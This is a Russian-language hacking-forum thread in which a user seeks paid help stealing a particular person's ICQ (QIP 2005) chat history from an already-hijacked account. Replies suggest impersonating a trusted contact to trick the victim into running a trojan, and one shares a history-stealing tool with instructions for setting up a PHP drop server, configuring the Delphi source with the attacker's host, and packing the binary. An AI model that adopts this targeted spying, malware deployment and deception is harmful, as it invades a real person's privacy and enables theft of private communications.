Нужно выцепить хистори из аськи.

В этой теме можно использовать автоматический гарант!

Aboreg

floppy-диск
Пользователь
Реакции
0
Нужно выцепить хистори из аськи.
такое возможно вообще?
как я понимаю, в теории да. я вижу 3 варианта:
- трояном
- с помощью скрытого ремоута на комп
- логи с самого сервера icq
устроит любой вариант, в том числе любой другой) главное получить хистори. клиент квип2005. физический контакт с компом не возможен. сама ася кстати уже взломана, хотя вряд ли это как-то поможет)
кто-нибудь возьмется? без предоплаты, с оплатой после доказательств. условия, цена вопроса и подробности по icq 552980120.
cпасибо!

спасибо. я и не знал о таком)
только вот, как я понял, там хранится история от джаббера, а не от аськи.
а у человека квип2005, в котором джаббера нет.
и кроме того, пльзователи 2005 квипа вообще вроде при регистрации не завязываются на этот сервис... uin и pass жертвы он не взял.

так что жду в асе грамотного взломщика =)

смари какой прикол можно замутить , войти в его аську - и тогда должны синхронизироваться контакты , то есть ты увидишь кто в контактном листе - возьми одного из группы типа favourite подмени icq номер на свой левый а имя оставь таким же - и постучи типа - помоги настроить ускоритель инета - ну вообщем включай СИ и впаривай троя

QIP-HS_update_0.2
QIP History Sender 0.1 by R_O_O_T. (V 0.2!!!)
программа ищет на компе файл с именем _srvlog.txt и ворует историю =) сделано исклюительно для ознакомления, а никак не для использования на других людях =)

--------====---------
ВНИМАНИЕ! вам понадобится хостинг с поддержкой РНР
--------====---------

инструкция.
1. зарегьте хост. создайте папку gate, выдайте ей права CHMOD 777, далее заливаем файл gate.php и ему выставляем права 777.
2. после этого откройте исходник(файл dpr ) в Delphi 6 или выше, найдите строку
const
host: pchar = 'ваш хост';
path: pchar = '/путь/gate.php';
и впишите эти параметры, далее скомпилите файл. дальше проверьте приходят ли к вам на хост файлы истории.
3. можете пожать файл PE compact'ом
4. все =)
Скачать
PS Это дело идёт с открытым кодом, и у тех у кого не стоит делфи или нету компилятора паскаля сделал маленький подгончик.
Скачать Compiler
Если не буду ленится может бинарный вариант настрочу..

спасибо.
проблема только в том, что я не обшаюсь с жертвой и не могу ей собственноручно впарить что-л. любая пересылка файлов лично от меня была бы подозрительна(

спасибо.
проблема только в том, что я не обшаюсь с жертвой и не могу ей собственноручно впарить что-л. любая пересылка файлов лично от меня была бы подозрительна(
А что мешает взять другой номер ICQ и к примеру попытаться познакомится, или под каким либо предлогом впарить ну скажем не файл, а фотку(классика) или что то ещё...

Напишите ответ...
Верх